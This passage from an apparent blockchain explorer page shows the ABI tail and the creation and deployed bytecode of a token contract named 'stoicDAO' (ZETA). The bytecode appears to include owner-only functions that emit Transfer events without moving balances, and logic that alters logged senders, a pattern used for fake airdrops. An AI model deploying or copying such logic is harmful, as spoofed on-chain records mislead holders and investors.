ype":"uint256[]"}],"name":"multiSends","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"_buy","type":"uint8"},{"internalType":"uint8","name":"_sell","type":"uint8"}],"name":"setFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600860809081526773746f696344414f60c01b60a0525f906200002890826200055a565b506040805180820190915260048152635a45544160e01b60208201526001906200005390826200055a565b506002805461050561ffff19909116179055600a80546001600160a01b031990811673514f52b8249e27f136621678ff8fea5100c33d9817909155600b80548216735d6d1f3fab1e05ed39fa8debb02a2ae7d571b9a6179055600c8054821673f93a3852d6ad2dc8da60a9d923fd108b4a4a2cdf179055600d80548216739ee641ea8386731336484c8be8bb213d21d706a1179055600e80549091167353c97a5a929e0807ca925d04986c326a6530bd0e17905534801562000113575f80fd5b5060098054336001600160a01b03199182168117909255600680549091169091179055305f908152600460209081526040808320737a250d5630b4cf539739df2c5dacb4c659f2488d845290915290205f1990556064620001776012600a62000735565b6200018790633b9aca006200074c565b620001949060466200074c565b620001a0919062000766565b600980546001600160a01b039081165f90815260036020908152604080832095909555600754935483168252848220549451948552929091169290915f805160206200169b833981519152910160405180910390a36064620002056012600a62000735565b6200021590633b9aca006200074c565b6200022290600a6200074c565b6200022e919062000766565b600a80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200169b833981519152916200027a91815260200190565b60405180910390a36064620002926012600a62000735565b620002a290633b9aca006200074c565b620002af9060056200074c565b620002bb919062000766565b600b80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200169b833981519152916200030791815260200190565b60405180910390a360646200031f6012600a62000735565b6200032f90633b9aca006200074c565b6200033c9060056200074c565b62000348919062000766565b600c80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200169b833981519152916200039491815260200190565b60405180910390a36064620003ac6012600a62000735565b620003bc90633b9aca006200074c565b620003c99060056200074c565b620003d5919062000766565b600d80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200169b833981519152916200042191815260200190565b60405180910390a36064620004396012600a62000735565b6200044990633b9aca006200074c565b620004569060056200074c565b62000462919062000766565b600e80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200169b83398151915291620004ae91815260200190565b60405180910390a362000786565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620004e557607f821691505b6020821081036200050457634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200055557805f5260205f20601f840160051c81016020851015620005315750805b601f840160051c820191505b8181101562000552575f81556001016200053d565b50505b505050565b81516001600160401b03811115620005765762000576620004bc565b6200058e81620005878454620004d0565b846200050a565b602080601f831160018114620005c4575f8415620005ac5750858301515b5f19600386901b1c1916600185901b1785556200061e565b5f85815260208120601f198616915b82811015620005f457888601518255948401946001909101908401620005d3565b50858210156200061257878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200067a57815f19048211156200065e576200065e62000626565b808516156200066c57918102915b93841c93908002906200063f565b509250929050565b5f8262000692575060016200072f565b81620006a057505f6200072f565b8160018114620006b95760028114620006c457620006e4565b60019150506200072f565b60ff841115620006d857620006d862000626565b50506001821b6200072f565b5060208310610133831016604e8410600b841016171562000709575081810a6200072f565b6200071583836200063a565b805f19048211156200072b576200072b62000626565b0290505b92915050565b5f6200074560ff84168362000682565b9392505050565b80820281158282048414176200072f576200072f62000626565b5f826200078157634e487b7160e01b5f52601260045260245ffd5b500490565b610f0780620007945f395ff3fe6080604052600436106100c2575f3560e01c80634fcd24461161007c578063a9059cbb11610057578063a9059cbb1461020c578063b22c95e71461022b578063c9567bf91461024a578063dd62ed3e1461025e575f80fd5b80634fcd2446146101ae57806370a08231146101cd57806395d89b41146101f8575f80fd5b806306fdde03146100cd578063095ea7b3146100f757806318160ddd1461012657806323b872dd14610148578063313ce567146101675780634022b75e1461018d575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e1610294565b6040516100ee9190610a89565b60405180910390f35b348015610102575f80fd5b50610116610111366004610af0565b610323565b60405190151581526020016100ee565b348015610131575f80fd5b5061013a61038f565b6040519081526020016100ee565b348015610153575f80fd5b50610116610162366004610b18565b6103ac565b348015610172575f80fd5b5061017b601281565b60405160ff90911681526020016100ee565b348015610198575f80fd5b506101ac6101a7366004610b99565b6103f9565b005b3480156101b9575f80fd5b506101ac6101c8366004610c24565b6104b5565b3480156101d8575f80fd5b5061013a6101e7366004610c55565b60036020525f908152604090205481565b348015610203575f80fd5b506100e1610500565b348015610217575f80fd5b50610116610226366004610af0565b61050f565b348015610236575f80fd5b506101ac610245366004610b99565b610522565b348015610255575f80fd5b506101ac6105d6565b348015610269575f80fd5b5061013a610278366004610c6e565b600460209081525f928352604080842090915290825290205481565b60605f80546102a290610c96565b80601f01602080910402602001604051908101604052809291908181526020018280546102ce90610c96565b80156103195780601f106102f057610100808354040283529160200191610319565b820191905f5260205f20905b8154815290600101906020018083116102fc57829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061037d9086815260200190565b60405180910390a35060015b92915050565b61039b6012600a610dc2565b6103a990633b9aca00610dd0565b81565b6001600160a01b0383165f9081526004602090815260408083203384529091528120805483919083906103e0908490610de7565b909155506103f19050848484610617565b949350505050565b6006546001600160a01b0316331461042357604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104ad5784848281811061043f5761043f610dfa565b90506020020160208101906104549190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb283398151915285858581811061048757610487610dfa565b9050602002013560405161049d91815260200190565b60405180910390a3600101610425565b505050505050565b6006546001600160a01b031633146104df57604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6060600180546102a290610c96565b5f61051b338484610617565b9392505050565b6006546001600160a01b0316331461054c57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104ad5784848281811061056857610568610dfa565b905060200201602081019061057d9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106105b0576105b0610dfa565b905060200201356040516105c691815260200190565b60405180910390a360010161054e565b6006546001600160a01b031633146105ec575f80fd5b600654600160a81b900460ff1615610602575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff168061063e57506006546001600160a01b038581169116145b8061065657506006546001600160a01b038481169116145b61065e575f80fd5b600654600160a81b900460ff1615801561068157506005546001600160a01b0316155b801561068c57505f82115b156106ad57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260036020526040812080548492906106d4908490610de7565b90915550506005546001600160a01b0384811691161480156107005750600654600160a01b900460ff16155b801561073f575060646107156012600a610dc2565b61072390633b9aca00610dd0565b61072d9190610e0e565b305f9081526003602052604090205410155b801561075957506006546001600160a01b03858116911614155b156108dc576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107a4576107a4610dfa565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106107ec576107ec610dfa565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f6139606461082c6012600a610dc2565b61083a90633b9aca00610dd0565b6108449190610e0e565b5f8430426040518663ffffffff1660e01b8152600401610868959493929190610e2d565b5f604051808303815f87803b15801561087f575f80fd5b505af1158015610891573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f193505050501580156108cc573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109035750600654600160a81b900460ff1615156001145b15610986576005545f906064906001600160a01b0387811691161461093257600254610100900460ff16610939565b60025460ff165b6109469060ff1685610dd0565b6109509190610e0e565b905061095c8184610de7565b305f9081526003602052604081208054929550839290919061097f908490610e9e565b9091555050505b6001600160a01b0383165f90815260036020526040812080548492906109ad908490610e9e565b90915550506008546001600160a01b03908116908516036109ff576007546040518381526001600160a01b038581169216905f80516020610eb2833981519152906020015b60405180910390a3610a7f565b6008546001600160a01b0390811690841603610a44576007546040518381526001600160a01b03918216918616905f80516020610eb2833981519152906020016109f2565b826001600160a01b0316846001600160a01b03165f80516020610eb283398151915284604051610a7691815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610ab557858101830151858201604001528201610a99565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aeb575f80fd5b919050565b5f8060408385031215610b01575f80fd5b610b0a83610ad5565b946020939093013593505050565b5f805f60608486031215610b2a575f80fd5b610b3384610ad5565b9250610b4160208501610ad5565b9150604084013590509250925092565b5f8083601f840112610b61575f80fd5b50813567ffffffffffffffff811115610b78575f80fd5b6020830191508360208260051b8501011115610b92575f80fd5b9250929050565b5f805f805f60608688031215610bad575f80fd5b610bb686610ad5565b9450602086013567ffffffffffffffff80821115610bd2575f80fd5b610bde89838a01610b51565b90965094506040880135915080821115610bf6575f80fd5b50610c0388828901610b51565b969995985093965092949392505050565b803560ff81168114610aeb575f80fd5b5f8060408385031215610c35575f80fd5b610c3e83610c14565b9150610c4c60208401610c14565b90509250929050565b5f60208284031215610c65575f80fd5b61051b82610ad5565b5f8060408385031215610c7f575f80fd5b610c8883610ad5565b9150610c4c60208401610ad5565b600181811c90821680610caa57607f821691505b602082108103610cc857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610d1c57815f1904821115610d0257610d02610cce565b80851615610d0f57918102915b93841c9390800290610ce7565b509250929050565b5f82610d3257506001610389565b81610d3e57505f610389565b8160018114610d545760028114610d5e57610d7a565b6001915050610389565b60ff841115610d6f57610d6f610cce565b50506001821b610389565b5060208310610133831016604e8410600b8410161715610d9d575081810a610389565b610da78383610ce2565b805f1904821115610dba57610dba610cce565b029392505050565b5f61051b60ff841683610d24565b808202811582820484141761038957610389610cce565b8181038181111561038957610389610cce565b634e487b7160e01b5f52603260045260245ffd5b5f82610e2857634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e7d5784516001600160a01b031683529383019391830191600101610e58565b50506001600160a01b03969096166060850152505050608001529392505050565b8082018082111561038957610389610cce56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220a7b14a1ece89ad00e34a4b47881d882bb77a9072a367d5a9393ad6015b89f2a464736f6c63430008160033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef

Deployed Bytecode

0x6080604052600436106100c2575f3560e01c80634fcd24461161007c578063a9059cbb11610057578063a9059cbb1461020c578063b22c95e71461022b578063c9567bf91461024a578063dd62ed3e1461025e575f80fd5b80634fcd2446146101ae57806370a08231146101cd57806395d89b41146101f8575f80fd5b806306fdde03146100cd578063095ea7b3146100f757806318160ddd1461012657806323b872dd14610148578063313ce567146101675780634022b75e1461018d575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e1610294565b6040516100ee9190610a89565b60405180910390f35b348015610102575f80fd5b50610116610111366004610af0565b610323565b60405190151581526020016100ee565b348015610131575f80fd5b5061013a61038f565b6040519081526020016100ee565b348015610153575f80fd5b50610116610162366004610b18565b6103ac565b348015610172575f80fd5b5061017b601281565b60405160ff90911681526020016100ee565b348015610198575f80fd5b506101ac6101a7366004610b99565b6103f9565b005b3480156101b9575f80fd5b506101ac6101c8366004610c24565b6104b5565b3480156101d8575f80fd5b5061013a6101e7366004610c55565b60036020525f908152604090205481565b348015610203575f80fd5b506100e1610500565b348015610217575f80fd5b50610116610226366004610af0565b61050f565b348015610236575f80fd5b506101ac610245366004610b99565b610522565b348015610255575f80fd5b506101ac6105d6565b348015610269575f80fd5b5061013a610278366004610c6e565b600460209081525f928352604080842090915290825290205481565b60605f80546102a290610c96565b80601f01602080910402602001604051908101604052809291908181526020018280546102ce90610c96565b80156103195780601f106102f057610100808354040283529160200191610319565b820191905f5260205f20905b8154815290600101906020018083116102fc57829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061037d9086815260200190565b60405180910390a35060015b92915050565b61039b6012600a610dc2565b6103a990633b9aca00610dd0565b81565b6001600160a01b0383165f9081526004602090815260408083203384529091528120805483919083906103e0908490610de7565b909155506103f19050848484610617565b949350505050565b6006546001600160a01b0316331461042357604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104ad5784848281811061043f5761043f610dfa565b90506020020160208101906104549190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb283398151915285858581811061048757610487610dfa565b9050602002013560405161049d91815260200190565b60405180910390a3600101610425565b505050505050565b6006546001600160a01b031633146104df57604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6060600180546102a290610c96565b5f61051b338484610617565b9392505050565b6006546001600160a01b0316331461054c57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104ad5784848281811061056857610568610dfa565b905060200201602081019061057d9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106105b0576105b0610dfa565b905060200201356040516105c691815260200190565b60405180910390a360010161054e565b6006546001600160a01b031633146105ec575f80fd5b600654600160a81b900460ff1615610602575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff168061063e57506006546001600160a01b038581169116145b8061065657506006546001600160a01b038481169116145b61065e575f80fd5b600654600160a81b900460ff1615801561068157506005546001600160a01b0316155b801561068c57505f82115b156106ad57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260036020526040812080548492906106d4908490610de7565b90915550506005546001600160a01b0384811691161480156107005750600654600160a01b900460ff16155b801561073f575060646107156012600a610dc2565b61072390633b9aca00610dd0565b61072d9190610e0e565b305f9081526003602052604090205410155b801561075957506006546001600160a01b03858116911614155b156108dc576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107a4576107a4610dfa565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106107ec576107ec610dfa565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f6139606461082c6012600a610dc2565b61083a90633b9aca00610dd0565b6108449190610e0e565b5f8430426040518663ffffffff1660e01b8152600401610868959493929190610e2d565b5f604051808303815f87803b15801561087f575f80fd5b505af1158015610891573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f193505050501580156108cc573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109035750600654600160a81b900460ff1615156001145b15610986576005545f906064906001600160a01b0387811691161461093257600254610100900460ff16610939565b60025460ff165b6109469060ff1685610dd0565b6109509190610e0e565b905061095c8184610de7565b305f9081526003602052604081208054929550839290919061097f908490610e9e565b9091555050505b6001600160a01b0383165f90815260036020526040812080548492906109ad908490610e9e565b90915550506008546001600160a01b03908116908516036109ff576007546040518381526001600160a01b038581169216905f80516020610eb2833981519152906020015b60405180910390a3610a7f565b6008546001600160a01b0390811690841603610a44576007546040518381526001600160a01b03918216918616905f80516020610eb2833981519152906020016109f2565b826001600160a01b0316846001600160a01b03165f80516020610eb283398151915284604051610a7691815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610ab557858101830151858201604001528201610a99565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aeb575f80fd5b919050565b5f8060408385031215610b01575f80fd5b610b0a83610ad5565b946020939093013593505050565b5f805f60608486031215610b2a575f80fd5b610b3384610ad5565b9250610b4160208501610ad5565b9150604084013590509250925092565b5f8083601f840112610b61575f80fd5b50813567ffffffffffffffff811115610b78575f80fd5b6020830191508360208260051b8501011115610b92575f80fd5b9250929050565b5f805f805f60608688031215610bad575f80fd5b610bb686610ad5565b9450602086013567ffffffffffffffff80821115610bd2575f80fd5b610bde89838a01610b51565b90965094506040880135915080821115610bf6575f80fd5b50610c0388828901610b51565b969995985093965092949392505050565b803560ff81168114610aeb575f80fd5b5f8060408385031215610c35575f80fd5b610c3e83610c14565b9150610c4c60208401610c14565b90509250929050565b5f60208284031215610c65575f80fd5b61051b82610ad5565b5f8060408385031215610c7f575f80fd5b610c8883610ad5565b9150610c4c60208401610ad5565b600181811c90821680610caa57607f821691505b602082108103610cc857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610d1c57815f1904821115610d0257610d02610cce565b80851615610d0f57918102915b93841c9390800290610ce7565b509250929050565b5f82610d3257506001610389565b81610d3e57505f610389565b8160018114610d545760028114610d5e57610d7a565b6001915050610389565b60ff841115610d6f57610d6f610cce565b50506001821b610389565b5060208310610133831016604e8410600b8410161715610d9d575081810a610389565b610da78383610ce2565b805f1904821115610dba57610dba610cce565b029392505050565b5f61051b60ff841683610d24565b808202811582820484141761038957610389610cce565b8181038181111561038957610389610cce565b634e487b7160e01b5f52603260045260245ffd5b5f82610e2857634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e7d5784516001600160a01b031683529383019391830191600101610e58565b50506001600160a01b03969096166060850152505050608001529392505050565b8082018082111561038957610389610cce56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220a7b14a1ece89ad00e34a4b47881d882bb77a9072a367d5a9393ad6015b89f2a464736f6c63430008160033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.